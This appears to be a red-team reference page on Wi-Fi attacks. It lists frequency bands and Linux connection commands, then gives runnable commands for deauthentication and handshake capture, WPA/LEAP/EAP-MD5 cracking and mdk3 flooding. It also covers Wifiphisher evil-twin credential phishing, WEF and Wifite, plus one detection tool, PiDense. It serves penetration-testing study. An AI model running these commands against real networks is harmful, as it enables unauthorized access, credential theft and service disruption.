A Red Teamer’s Guide to Wi-Fi Exploits

Wireless Technology and Frequency Spectrum Overview

Understanding the frequency spectrum and its various applications is crucial for professionals working with wireless technologies. This document outlines the frequency ranges and associated technologies, providing insights into their usage and characteristics.

Frequency Bands and Technologies

  1. RFID (Radio Frequency Identification)

    • LF (Low Frequency): 120-150 kHz

    • HF (High Frequency): 13.56 MHz

    • UHF (Ultra-High Frequency): 433 MHz

  2. Keyless Entry Systems

    • North America: 315 MHz

    • Europe and Asia: 433.92 MHz

  3. Cellular Frequencies (US)

    • 698-894 MHz: LTE Band 12, 13, 17

    • 1710-1755 MHz: AWS (Advanced Wireless Services)

    • 1850-1910 MHz: PCS (Personal Communications Service)

    • 2110-2155 MHz: AWS

  4. Global Positioning System (GPS)

    • L1: 1575.42 MHz

    • L2: 1227.60 MHz

  5. L Band

    • Frequency Range: 1-2 GHz

  6. 802.15.4 (ZigBee)

    • Europe: 868 MHz

    • US and Australia: 915 MHz

  7. 802.15.1 (Bluetooth)

    • Frequency Range: 2.4-2.483.5 GHz

  8. Wi-Fi Standards

    • 802.11 b/g: 2.4 GHz

    • 802.11a: 5.0 GHz

    • 802.11n: 2.4/5.0 GHz

  9. Satellite and Microwave Communication

    • C Band: 4-8 GHz

    • Ku Band: 12-18 GHz

    • K Band: 18-26.5 GHz

    • Ka Band: 26.5-40 GHz

Tools and Commands

To work effectively with these frequencies and technologies, various tools and commands are used by engineers and technicians:

FCC ID Lookup

For identifying devices and their frequency allocations, the FCC ID lookup tool is invaluable:

Frequency Databases

Accessing a comprehensive database for frequency information is essential for planning and troubleshooting:

Practical Commands

Linux Networking Commands

View Wireless Interfaces:

iwconfig

Monitor Mode Activation:

airmon-ng start wlan0

Packet Capture:

airodump-ng wlan0mon

Bluetooth Scanning

  • **Scan for Bluetooth Devices: **

hcitool scan

ZigBee Network Analysis

  • Scan for ZigBee Channels:

sudo zbstumbler /dev/ttyUSB0

Wireless Hacking with Kismet and Linux Wi-Fi Commands

Kismet is a powerful wireless network detector, sniffer, and intrusion detection system. It supports multiple wireless cards and is compatible with various protocols. Below is a comprehensive guide to Kismet commands and essential Linux Wi-Fi commands for effective wireless network management and analysis.

Kismet Commands

Kismet provides a variety of commands for managing and analyzing wireless networks. Here is a detailed table of the Kismet commands along with their descriptions:

Command
Description

e

Show Kismet servers

h

Display help

z

Full-screen display

n

Show current network number

m

Mute sound

i

Network details

t

Tag or untag a network

s

Sort the network list

g

Group tagged networks

l

Show wireless card power levels

u

Ungroup the current group

d

Display settings

c

Show current network users

r

Packet rate graph

L

Lock channel to the selected channel

a

Display network statistics

H

Return to normal channel hopping

p

Packet type capture

+/-

Expand/collapse network groups

f

Center the network

CTRL+L

Redraw the screen

w

Track alerts

Q

Quit Kismet

X

Close popup window

Essential Linux Wi-Fi Commands

Managing Wi-Fi networks in Linux involves using various command-line tools for configuration, monitoring, and troubleshooting. Below is a table of essential Linux Wi-Fi commands:

Command
Description

iwconfig

Configure wireless network interfaces

rfkill list

Display the status of RF (radio frequency) devices

rfkill unblock all

Enable all RF devices (e.g., Wi-Fi)

airodump-ng mon0

Monitor all wireless network interfaces

Practical Examples

Using Kismet

Starting Kismet

sudo kismet

  1. Viewing Network Details

    • Press i to see the details of a selected network.

  2. Sorting the Network List

    • Press s to sort the list of detected networks.

  3. Displaying Current Users

    • Press c to display the users connected to the current network.

Using Linux Wi-Fi Commands

  1. Configuring Wireless Interfaces

sudo iwconfig wlan0 essid "YourNetworkSSID" key s:password

Checking RF Device Status

sudo rfkill list

Unblocking All RF Devices

sudo rfkill unblock all

Monitoring Wireless Interfaces

sudo airodump-ng mon0

Connecting to Wireless Networks in Linux

Below is a detailed guide on connecting to various types of wireless networks in Linux using command-line tools. This guide covers connections to unsecured networks, WEP, WPA-PSK, and WPA-Enterprise networks.

Connecting to an Unsecured Network

To connect to an unsecured (open) network, use the following commands:

Command
Description

iwconfig ath0 essid $SSID

Set the SSID of the wireless network

ifconfig ath0 up

Bring the wireless interface up

dhclient ath0

Obtain an IP address via DHCP

Example:

iwconfig ath0 essid "OpenNetwork"
ifconfig ath0 up
dhclient ath0

Connecting to a WEP Network

To connect to a WEP-secured network, use the following commands:

Command
Description

iwconfig ath0 essid $SSID key

Set the SSID and WEP key

ifconfig ath0 up

Bring the wireless interface up

dhclient ath0

Obtain an IP address via DHCP

Example:

iwconfig ath0 essid "WEPNetwork" key s:your_wep_key
ifconfig ath0 up
dhclient ath0

Connecting to a WPA-PSK Network

To connect to a WPA-PSK (Pre-Shared Key) network, use the following commands:

Command
Description

iwconfig ath0 essid $SSID

Set the SSID of the wireless network

ifconfig ath0 up

Bring the wireless interface up

wpa_supplicant -B -i ath0 -c wpa-psk.conf

Start the WPA supplicant daemon with the config

dhclient ath0

Obtain an IP address via DHCP

Example:

  1. Create a WPA-PSK configuration file (wpa-psk.conf)

network={
    ssid="WPA_PSK_Network"
    psk="your_wpa_psk_password"
}

  1. Run the commands:

iwconfig ath0 essid "WPA_PSK_Network"
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

Connecting to a WPA-Enterprise Network

To connect to a WPA-Enterprise network, use the following commands:

Command
Description

iwconfig ath0 essid $SSID

Set the SSID of the wireless network

ifconfig ath0 up

Bring the wireless interface up

wpa_supplicant -B -i ath0 -c wpa-ent.conf

Start the WPA supplicant daemon with the config

dhclient ath0

Obtain an IP address via DHCP

Example: Create a WPA-Enterprise configuration file (wpa-ent.conf):

network={
    ssid="WPA_Enterprise_Network"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="your_username"
    password="your_password"
    phase2="auth=MSCHAPV2"
}

Run the commands:

iwconfig ath0 essid "WPA_Enterprise_Network"
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0

Wi-Fi Network Testing in Linux

Testing Wi-Fi networks in Linux involves a series of commands to place wireless interfaces into monitor mode, capture handshakes, perform brute force attacks, and conduct denial-of-service (DoS) attacks. This guide provides a structured approach to these tasks using common tools such as airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, mdk3, and others.

Setting Up Monitor Mode

To begin testing, you need to place your wireless interface into monitor mode. This allows you to capture all wireless traffic in your vicinity.

Command
Description

airmon-ng stop ath0

Stop any processes on ath0 to prepare for monitor mode

airmon-ng start wifi0

Start monitor mode on wifi0 interface

iwconfig ath0 channel $CH

Set the channel on ath0 to channel $CH

Example:

airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel 6

Capturing Client Handshake

Capturing the WPA/WPA2 handshake is crucial for performing brute force attacks.

Command
Description

airodump-ng -c $CH --bssid $AP -w file ath0

Capture traffic on channel $CH from access point $AP and save to file

aireplay-ng -0 10 -a $AP -c $CH ath0

Send 10 de-authentication packets to force clients to reconnect, capturing the handshake

Example:

airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture ath0
aireplay-ng -0 10 -a 00:11:22:33:44:55 -c 00:22:33:44:55:66 ath0

Brute Force Handshake Attack

Once the handshake is captured, a brute force attack can be attempted to find the WPA-PSK.

Command
Description

aircrack-ng -w wordlist capture.cap

Brute force WPA-PSK using wordlist against capture.cap

asleap -r capture.cap -w dict.asleap

Brute force LEAP using dict.asleap against capture.cap

eapmd5pass -r capture.cap -w wordlist

Brute force EAP-MD5 using wordlist against capture.cap

Example:

aircrack-ng -w wordlist.txt capture.cap
asleap -r capture.cap -w dict.asleap
eapmd5pass -r capture.cap -w wordlist.txt

Denial of Service (DoS) Attack

Performing a DoS attack can flood the network with various types of packets, disrupting service.

Command
Description

mdk3 int a -a $AP

Authentication flood on $AP

mdk3 int b -c $CH

Beacon flood on channel $CH

Example:

mdk3 wlan0 a -a 00:11:22:33:44:55
mdk3 wlan0 b -c 6

Wifiphisher Overview and Usage Guide

Wifiphisher is a powerful, flexible, modular, easy-to-use tool for conducting man-in-the-middle (MiTM) attacks to obtain credentials from unsuspecting Wi-Fi users. This tool runs on Linux and is especially effective when deployed on a Raspberry Pi. It supports various Wi-Fi association techniques, such as Evil Twin, KARMA, and Known Beacons, and comes with community-driven phishing templates for different scenarios.

Key Features

  • Powerful: Capable of running for extended periods on devices like Raspberry Pi, employing various Wi-Fi association techniques.

  • Flexible: Supports numerous arguments and community-driven phishing templates.

  • Modular: Users can write Python modules to expand functionality or create custom phishing scenarios.

  • Easy to Use: Beginners can start with simple commands, while advanced users can utilize the full feature set.

  • Research-Backed: Incorporates state-of-the-art phishing techniques disclosed by developers.

  • Community-Supported: Developed and maintained by an active community.

  • Free: Available for free download with full source code under the GPLv3 license.

How It Works

Wi-Fi phishing with Wifiphisher involves two main steps:

  1. Establishing MiTM Position: Wifiphisher uses techniques like Evil Twin, KARMA, and Known Beacons to associate with Wi-Fi clients unknowingly.

  2. Performing Phishing Attacks: Once a MiTM position is established, various phishing attacks can be conducted, such as data sniffing or web-based credential capture.

Installation

To install the latest development version, use the following commands:

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Example Commands

  1. Manual Interface Selection and Firmware Upgrade Scenario:

wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap

  • -aI wlan0: Use wlan0 for spawning the rogue Access Point.

  • -jI wlan4: Use wlan4 for DoS attacks.

  • -p firmware-upgrade: Perform the “Firmware Upgrade” scenario.

  • --handshake-capture handshake.pcap: Verify the captured Pre-Shared Key against the handshake file.

  1. Automatic Interface Selection and Plugin Update Scenario:

wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd

  • --essid CONFERENCE_WIFI: Target the Wi-Fi network with ESSID “CONFERENCE_WIFI”.

  • -p plugin_update: Perform the “Plugin Update” scenario.

  • -pK s3cr3tp4ssw0rd: Protect the Evil Twin with PSK “s3cr3tp4ssw0rd”.

  1. Open Wi-Fi Network and OAuth Login Scenario:

wifiphisher --essid "FREE WI-FI" -p oauth-login -kB

  • --essid "FREE WI-FI": Spawn an open Wi-Fi network with ESSID “FREE WI-FI”.

  • -p oauth-login: Perform the “OAuth Login” scenario.

  • -kB: Use the Known Beacons technique.

Command-Line Options

Below is a table of useful command-line options for Wifiphisher:

Short Form
Long Form
Description

-h

--help

Show help message and exit

-i

--interface

Choose an interface that supports both AP and monitor modes

-eI

--extensionsinterface

Choose an interface that supports monitor mode for running extensions

-aI

--apinterface

Choose an interface that supports AP mode for spawning an AP

-pI

--protectinterface

Specify interfaces protected from NetworkManager

-kN

--keepnetworkmanager

Do not kill NetworkManager

-nE

--noextensions

Do not load any extensions

-e

--essid

Enter the ESSID of the rogue Access Point

-pPD

--phishing-pages-directory

Search for phishing pages in the specified directory

-p

--phishingscenario

Choose the phishing scenario to run

-pK

--presharedkey

Add WPA/WPA2 protection on the rogue Access Point

-qS

--quitonsuccess

Stop the script after successfully retrieving one pair of credentials

-lC

--lure10-capture

Capture BSSIDs during AP selection phase as part of Lure10 attack

-lE

--lure10-exploit

Exploit the captured BSSIDs to fool Windows Location Service

-iAM

--mac-ap-interface

Specify MAC address of the AP interface

-iEM

--mac-extensions-interface

Specify MAC address of the extensions interface

-iNM

--no-mac-randomization

Do not change any MAC address

-hC

--handshake-capture

Capture WPA/WPA2 handshakes for verifying passphrase

-dE

--deauth-essid

Deauth all BSSIDs in the WLAN with the specified ESSID

-dC

--deauth-channels

Channels to deauth

--logging

Enable logging.

Output will be saved to wifiphisher.log file

-lP

--logpath

Determine the full path of the logfile

-cP

--credential-log-path

Determine the full path of the file that will store any captured credentials

-cM

--channel-monitor

Monitor if the target access point changes the channel

--payload-path

Enable the payload path.

Intended for use with scenarios that serve payloads

-wP

--wps-pbc

Monitor if the button on a WPS-PBC Registrar side is pressed

-wAI

--wpspbc-assoc-interface

The WLAN interface used for associating to the WPS Access Point

-kB

--known-beacons

Perform the Known Beacons Wi-Fi automatic association technique

-fH

--force-hostapd

Force the usage of hostapd installed in the system

--dnsmasq-conf

DNSMASQ_CONF

Determine the full path of dnmasq.conf file

-dK

--disable-karma

Disable KARMA attack

-pE

--phishing-essid

Determine the ESSID you want to use for the phishing page

WEF (WiFi Exploitation Framework) Overview and Usage Guide

WEF is a comprehensive tool designed for executing a variety of Wi-Fi attacks. It supports numerous attack types, automatic handshake capture and cracking, and provides multiple templates for EvilTwin attacks in different languages. This guide provides an overview of its features, installation process, common usage commands, and available attacks.

Key Features

  • WPA/WPA2, WPS, and WEP Attacks: Supports a wide range of attacks on different Wi-Fi security protocols.

  • Automatic Handshake Capture and Cracking: Facilitates easy capture and cracking of WPA/WPA2 handshakes.

  • Multiple Templates for EvilTwin Attack: Offers various templates in different languages for conducting EvilTwin attacks.

  • Monitor Mode Management: Allows enabling/disabling monitor mode and viewing interface info (frequencies, chipset, MAC address).

  • 2.4 GHz and 5 GHz Support: Capable of attacking networks on both frequency bands.

  • Informative Attack Logs: Provides detailed logs of the conducted attacks.

  • Custom Wordlist Selector: Enables selection of custom wordlists when cracking.

  • Language Support: Available in English and Spanish.

git clone https://github.com/D3Ext/WEF
bash wef

Available Attacks

Attack Type
Description

Deauthentication Attack

Disconnects clients from a network.

WIDS Confusion Attack

Confuses Wireless Intrusion Detection Systems.

Authentication Attack

Floods AP with authentication requests.

Beacon Flood Attack

Floods the airwaves with fake beacon frames.

TKIP Attack (Michael Shutdown Exploitation)

Exploits vulnerabilities in TKIP.

Pixie Dust Attack

Offline attack against WPS networks.

Null Pin Attack

Tests all-zero WPS pins.

PIN Bruteforce Attack

Attempts to brute-force WPS pins.

ARP Replay Attack

Generates traffic to capture IVs for WEP cracking.

HIRTE Attack

Attacks WEP-protected networks via clients.

Caffe Latte Attack

Cracks WEP keys by targeting clients.

Fake Authentication Attack

Fakes authentication to the target AP.

WPA/WPA2 Handshake Capture Attack

Captures WPA/WPA2 handshakes for cracking.

PMKID Attack

Exploits a vulnerability in WPA/WPA2 for handshakes.

EvilTwin Attack

Creates a rogue AP to capture credentials.

Command-Line Options

Short Form
Long Form
Description

-i

--interface

Specify your network adapter interface in managed mode

-h

--help

Show the help panel

--version

Print the version and exit

GeoWiFi: WiFi Geolocation Data Search Tool

GeoWiFi is a powerful tool designed to search WiFi geolocation data by BSSID and SSID using various public databases. This guide covers its key features, installation, usage, and command options.

Key Features

  • Database Support: GeoWiFi queries multiple databases including Wigle, Apple, Google, Milnikov, WifiDB, and Combain.

  • Output Flexibility: Supports output in map or JSON format.

  • Custom Configuration: Allows API configuration through a YAML file.

  • Docker Support: Can be run using Docker for ease of deployment.

Installation

Prerequisites

  • Python 3

  • Windows Terminal (recommended for Windows users to display emojis)

Configuration

GeoWiFi uses a configuration file located at gw_utils/config.yaml to store API keys and other settings.

Example Configuration (config.yaml):

wigle_auth: "your_wigle_encoded_key"
google_api: "your_google_api_key"
combain_api: "your_combain_api_key"
no-ssl-verify: false

Usage

Command-Line Interface

usage: geowifi.py [-h] [-s {bssid,ssid}] [-o {map,json}] identifier

Search for information about a network with a specific BSSID or SSID.

positional arguments:
  identifier            The BSSID or SSID of the network to search for.

options:
  -h, --help            Show this help message and exit
  -s {bssid,ssid}, --search-by {bssid,ssid}
                        Specifies whether to search by BSSID or SSID (default: bssid)
  -o {map,json}, --output-format {map,json}
                        Specifies the output format for the search results (default: map)

Examples

  1. Search by BSSID:

python3 geowifi.py -s bssid 00:11:22:33:44:55

Search by SSID:

python3 geowifi.py -s ssid "NetworkName"

Output in JSON Format:

python3 geowifi.py -s bssid 00:11:22:33:44:55 -o json

Output in Map Format:

python3 geowifi.py -s ssid "NetworkName" -o map

PiDense: Monitoring Illegal Wireless Network Activities

Purpose PiDense is designed to monitor and detect illegal wireless network activities. It focuses on identifying suspicious SSID broadcasts, detecting deauthentication attacks, and monitoring various wireless network anomalies such as KARMA attacks and WiFi Pineapple activities. Capabilities

  • Detects similar SSID broadcasts

  • Detects SSID brute force attacks

  • Detects beacon floods

  • Monitors deauthentication attacks

  • Identifies unencrypted wireless network density

  • Monitors SSID broadcasts against a blacklist

  • Detects KARMA attacks

  • Monitors WiFi Pineapple activities Soon to be Added Features

  • Pcap parsing

  • Company name setting for monitoring illegal wireless activities

  • Probe request analysis for SSID brute force detection

  • Beacon analysis for SSID flood detection Working Principle PiDense operates by monitoring wireless network activities and analyzing broadcasted SSIDs, encryption types, and detecting anomalies. It uses scapy for packet manipulation and analysis, and provides alerts when suspicious activities are detected.

Installation and Usage

Requirements

  • Hardware: TP-LINK TL-WN722N

  • Modules: scapy, time, termcolor, argparse

  • Operating System: Kali Linux

Command Options

The following table provides a summary of the primary commands and their usage for PiDense.

Command
Description

git clone https://github.com/WiPi-Hunter/PiDense.git

Clone the PiDense repository from GitHub

pip install scapy termcolor argparse

Install required Python modules

airmon-ng start wlan0

Enable monitor mode on wlan0 using airmon-ng

ifconfig wlan0 down

Bring down the wlan0 interface

iwconfig wlan0 mode Monitor

Set wlan0 to monitor mode

ifconfig wlan0 up

Bring up the wlan0 interface

cd PiDense

Navigate to the PiDense directory

python pidense.py -h

Display help information for PiDense

Wifite: Wireless Network Auditing Tool

Wifite is a comprehensive Python script for auditing wireless networks, leveraging existing tools to automate the process of retrieving wireless access point passwords. This guide provides a detailed overview of Wifite’s features, installation, usage, and command options.

Purpose

Wifite automates wireless network attacks by utilizing various existing tools to perform the following actions:

  • WPS Offline Pixie-Dust attack

  • WPS Online Brute-Force PIN attack

  • WPA Handshake Capture + offline crack

  • WPA PMKID Hash Capture + offline crack

  • Various known WEP attacks

Key Features

Feature
Description

WPS Pixie-Dust Attack

Offline brute-force attack on WPS

WPS PIN Attack

Online brute-force attack on WPS PIN

WPA Handshake Capture

Captures WPA handshake for offline cracking

WPA PMKID Hash Capture

Captures PMKID hashes for offline cracking

WEP Attacks

Supports multiple WEP attacks including fragmentation, chop-chop, aireplay, etc.

5GHz Support

Supports 5GHz frequency for some wireless cards

Automatic Handshake Validation

Validates handshakes with pyrit, tshark, cowpatty, and aircrack-ng

Cracked Password Storage

Stores cracked passwords and handshakes in the current directory

Verbose Mode

Provides detailed output of executed commands for educational purposes

Compatibility

Designed for Kali Linux and ParrotSec, with Python 3 support

Installation

Prerequisites

  • Wireless card capable of Monitor Mode and packet injection

  • Python (compatible with both Python2 and Python3)

  • Required Tools: iwconfig, ifconfig, aircrack-ng suite, tshark, reaver, bully, coWPAtty, pyrit, hashcat, hcxdumptool, hcxpcaptool

Usage

Command-Line Interface

usage: Wifite.py [options]

Wifite is a tool to automate wireless security auditing.

optional arguments:
  -h, --help    show this help message and exit
  -i, --iface   set the wireless interface (default: auto)
  -c, --channel set the channel (default: all channels)
  --pmkid       capture PMKID hashes (default: enabled)
  --pixie       use Pixie-Dust attack (default: enabled)
  --no-pixie    disable Pixie-Dust attack
  --wps-only    attack only WPS-enabled networks
  --no-wps      do not attack WPS-enabled networks
  --crack       crack captured handshakes/PMKID hashes with a wordlist
  --no-deauths  do not send deauth packets
  -v, --verbose increase verbosity of output

Examples

  1. Run Wifite with Default Settings: sudo ./Wifite.py

  2. Capture PMKID Hashes Only: sudo ./Wifite.py --pmkid

  3. Disable Pixie-Dust Attack: sudo ./Wifite.py --no-pixie

  4. Attack Only WPS-Enabled Networks: sudo ./Wifite.py --wps-only

  5. Crack Captured Handshakes with a Wordlist: sudo ./Wifite.py --crack -w /path/to/wordlist.txt

PreviousWireless and Wi-FiNextOSWP PEN-210

Last updated